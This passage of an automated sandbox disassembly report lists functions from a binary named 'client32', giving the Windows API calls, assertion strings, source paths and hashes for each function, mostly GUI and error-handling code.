Instruction ID: 55b3f6273447a840922a2276b3415970a39c2bc3f54fc53508d86eb1e8118ba0
Opcode Fuzzy Hash: 9301bb4a703dc9f718e6a03bc63426bc399485c21c7871a03d02741ec2ccad78
Instruction Fuzzy Hash: C3F0C876640219BFD710CE55DCC6F9BB39CEB88754F108425F61597280D6B1E84087A4

Function 11015400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 110AB01D

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\ctl32\listview.cpp, xrefs: 110AAFFE
m_hWnd, xrefs: 11015413, 110AB003
..\ctl32\liststat.cpp, xrefs: 1101540E

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: ..\ctl32\liststat.cpp$..\ctl32\listview.cpp$m_hWnd
API String ID: 819365019-2727927828
Opcode ID: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
Instruction ID: c68bebcfb275c132091ba8ffe4505af5196cb7164de974b36e44453814cc3cc0
Opcode Fuzzy Hash: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
Instruction Fuzzy Hash: 4DF02B34FC0720AFD720D581EC42FCAB3D4AB05709F004469F5562A2D1E5B0B8C0C7D1

Function 110ED470 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 110ED498

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

IsWindow(hRich), xrefs: 110ED4A9
lpNmHdr!=0, xrefs: 110ED483
..\CTL32\NSWin32.cpp, xrefs: 110ED47E, 110ED4A4

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcessWindowwsprintf
String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$lpNmHdr!=0
API String ID: 2577986331-1331251348
Opcode ID: 7e39479067b6c5f95eacce72c06cd62ac8a6f0ae8e6ec8608ac651044464dd8e
Instruction ID: 93283a680bb1c801d139a1839617fb2f1f19efec68c8bcedb592c4b0da2aa86f
Opcode Fuzzy Hash: 7e39479067b6c5f95eacce72c06cd62ac8a6f0ae8e6ec8608ac651044464dd8e
Instruction Fuzzy Hash: 8DF0E279E036327BD612A9177C0AFCFF768DBA1AA9F058061F80D26101EB34720082E9

Function 1103F4C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F466
Part of subcall function 1103F450: FindWindowA.USER32 ref: 1103F47C
Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F484
Part of subcall function 1103F450: Sleep.KERNEL32(00000014), ref: 1103F497
Part of subcall function 1103F450: FindWindowA.USER32 ref: 1103F4A7
Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F4AF

IsWindow.USER32(00000000), ref: 1103F4EA
SendMessageA.USER32(00000000,0000004A,00000000,00000501), ref: 1103F4FD

Strings

DoMMData - could not find %s window, xrefs: 1103F50D
PCIVideoSlave32, xrefs: 1103F508

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Find$MessageSendSleep
String ID: DoMMData - could not find %s window$PCIVideoSlave32
API String ID: 1010850397-3146847729
Opcode ID: aae4a453ef0a99841fb0c8f2bdb4662e73cf68ed11950b93a08a3e71c3a39851
Instruction ID: 9c7747beff98129d0e206a6ba61550f1bc8c1a2fc0044bc1d9efbb7d24d88507
Opcode Fuzzy Hash: aae4a453ef0a99841fb0c8f2bdb4662e73cf68ed11950b93a08a3e71c3a39851
Instruction Fuzzy Hash: BBF02735E8121C77D710AA98AC0ABEEBB689B0170EF004098ED1966280EBB5251087DB

Function 11081680 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 110816D7

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\CTL32\DataStream.cpp, xrefs: 11081694
IsA(), xrefs: 11081699, 110816C0
e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h, xrefs: 110816BB

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcess_freewsprintf
String ID: ..\CTL32\DataStream.cpp$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
API String ID: 2441568934-1875806619
Opcode ID: 447824e72cda998df234909720421efff22f71a3ff5c8715bed7def871f972f3
Instruction ID: 681d8586094b0eb4f99e23d602ddbaf233b7ff3414f9fb7bc0106feac7c5022a
Opcode Fuzzy Hash: 447824e72cda998df234909720421efff22f71a3ff5c8715bed7def871f972f3
Instruction Fuzzy Hash: E8F027B8F083221FEA30DE54BC02BC9F7D01F0824CF080494E9C327240E7B26818C6E2

Function 110EFB20 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

GetDeviceCaps.GDI32(?,0000000E,00000000,00000000,?,?,110F0082,00000000,?,?,?,?,110F011A,00000000), ref: 110EFB32
GetDeviceCaps.GDI32(?,0000000C,?,?,110F0082,00000000,?,?,?,?,110F011A,00000000,?,?,110F0E7E,?), ref: 110EFB39

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\CTL32\pcibmp.cpp, xrefs: 110EFB50
nColors, xrefs: 110EFB55

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CapsDevice$ErrorExitLastMessageProcesswsprintf
String ID: ..\CTL32\pcibmp.cpp$nColors
API String ID: 2713834284-4292231205
Opcode ID: c8878a077f428f9bb25e6d41f0c44af9662807efe6cd3c41329cf584f49568f3
Instruction ID: cfed96a02f924fb25650393b30a092bd0643f011e0ddcc2ee79cac053fdacdf4
Opcode Fuzzy Hash: c8878a077f428f9bb25e6d41f0c44af9662807efe6cd3c41329cf584f49568f3
Instruction Fuzzy Hash: 4AE04F23F4123937EA11659AAC46FCAF79C9B867A8F0201B2FA04FB392E5D16C0446D5

Function 1103D1F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30windowCOMMON

Download Yara Rule

APIs

Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,756F110C,1100BF7B), ref: 11110928
Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935

_free.LIBCMT ref: 1103D221

Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000), ref: 11163ABB
Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD

Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010,?), ref: 11110970

SetPriorityClass.KERNEL32(?,?), ref: 1103D24C
MessageBeep.USER32(00000000), ref: 1103D25E

Strings

Show has overrun too much, aborting, xrefs: 1103D1F1

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$BeepClassEnterErrorFreeHeapLastMessagePriority_free
String ID: Show has overrun too much, aborting
API String ID: 304545663-4092325870
Opcode ID: 38cbc4052beda61ee506a84b884a1a9d6557445bc312e3507d1d7bbe4ecf2d69
Instruction ID: 9026de0c3b0683949d6f7ac94f5710338a9a532b2cd303e3c01edb637dee248d
Opcode Fuzzy Hash: 38cbc4052beda61ee506a84b884a1a9d6557445bc312e3507d1d7bbe4ecf2d69
Instruction Fuzzy Hash: 50F0B4B4B016139BFB59CBB08914BD9F69DBF8071DF000118E92C97280EB70B224C7D2

Function 1101D3C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 1101D3EB
EnableWindow.USER32(00000000,?), ref: 1101D3F6

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 1101D3D6
e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h, xrefs: 1101D3D1

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
API String ID: 1136984157-1986719024
Opcode ID: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
Instruction ID: 36c1a6ee6805b1b90e48090b7f41ce0c53d42d7852bf61e64861d4a713bbcb04
Opcode Fuzzy Hash: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
Instruction Fuzzy Hash: E3E0867950022DBFC7149E91DC85EAAF35CEB44269F00C135F96656644D674E84087A4

Function 11027530 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23sleepthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?), ref: 11027561
EnumWindows.USER32(11027450,00000000), ref: 1102756A
ExitThread.KERNEL32 ref: 11027577

Strings

TapiFix, xrefs: 11027536

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnumExitSleepThreadWindows
String ID: TapiFix
API String ID: 1804117399-2824097521
Opcode ID: 9b936a382379f1639e294998df4fda084f6c97918e753868017fe61e0b06262c
Instruction ID: 0d22cb111dc1a1c74f2ece42ee292e751dc76676b098746739fa73436add6467
Opcode Fuzzy Hash: 9b936a382379f1639e294998df4fda084f6c97918e753868017fe61e0b06262c
Instruction Fuzzy Hash: C7E04838A4167CAFE615DB918D84F56BA989B5535CF810030E4351664597B07940C7A9

Function 1101D410 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 1101D43F
ShowWindow.USER32(00000000), ref: 1101D446

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 1101D426
e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h, xrefs: 1101D421

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitItemLastMessageProcessShowWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
API String ID: 1319256379-1986719024
Opcode ID: 8377f77b347f7a331b9e274c23780b90952fd8225b6a3357c05bbe4f1f66010c
Instruction ID: e0f7042720cd81023d22bad3d6b473d4ff1ed87f82d399384176be7cf1b5ebc2
Opcode Fuzzy Hash: 8377f77b347f7a331b9e274c23780b90952fd8225b6a3357c05bbe4f1f66010c
Instruction Fuzzy Hash: D3E04F7594032DBBC7049A95DC89EEAB39CEB54229F008025F92556600E670A84087A0

Function 1100BB30 Relevance: 6.2, APIs: 4, Instructions: 177COMMON

Download Yara Rule

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

std::exception::exception.LIBCMT ref: 1100BBF0
__CxxThrowException@8.LIBCMT ref: 1100BC05
std::exception::exception.LIBCMT ref: 1100BC14
__CxxThrowException@8.LIBCMT ref: 1100BC29

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$_malloc_memsetwsprintf
String ID:
API String ID: 1651403513-0
Opcode ID: d105c775ddae6e4726b07b80f939296b7c9628154e9c4022b4af25f4ab2e10ff
Instruction ID: 24df0323ce75f1771b5e486737171493ff854af14d8bb6c891eae8217b7a1c7e
Opcode Fuzzy Hash: d105c775ddae6e4726b07b80f939296b7c9628154e9c4022b4af25f4ab2e10ff
Instruction Fuzzy Hash: 28711BB9A05B09DFD715CF68C980A9AFBF4FB48714F10866EE86A97740D730A904CB91

Function 11165643 Relevance: 6.1, APIs: 4, Instructions: 130COMMONLIBRARYCODE

Download Yara Rule

APIs

_memmove.LIBCMT ref: 111656DE
__flush.LIBCMT ref: 111656FC
__write.LIBCMT ref: 11165723
__flsbuf.LIBCMT ref: 1116574E

Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 34f750520889ae1c8a8219b8bb8fb379717b18fbdc33fa4f6fc2ff7c413ea70f
Instruction ID: 2bbfea60a2a12786820c2de27e6caf434d82015e81e2d2deebce7f4ca3d92771
Opcode Fuzzy Hash: 34f750520889ae1c8a8219b8bb8fb379717b18fbdc33fa4f6fc2ff7c413ea70f
Instruction Fuzzy Hash: 7541F635A00B05DFDB558F65D94059EFBBEEF803A4F254128D45597240E7F6ED60CB40

Function 11067900 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON

Download Yara Rule

APIs

MessageBeep.USER32(00000000,?,11071AD8,?,?,?,1106D28C,006A006A,B24479DC,?,?,00000000,11182C98,000000FF,?,11071AD8), ref: 1106791B
MessageBeep.USER32(00000000,?,11071AD8,?,?,?,1106D28C,006A006A,B24479DC,?,?,00000000,11182C98,000000FF,?,11071AD8), ref: 11067957
MessageBeep.USER32(00000000,?,11071AD8), ref: 110679AA
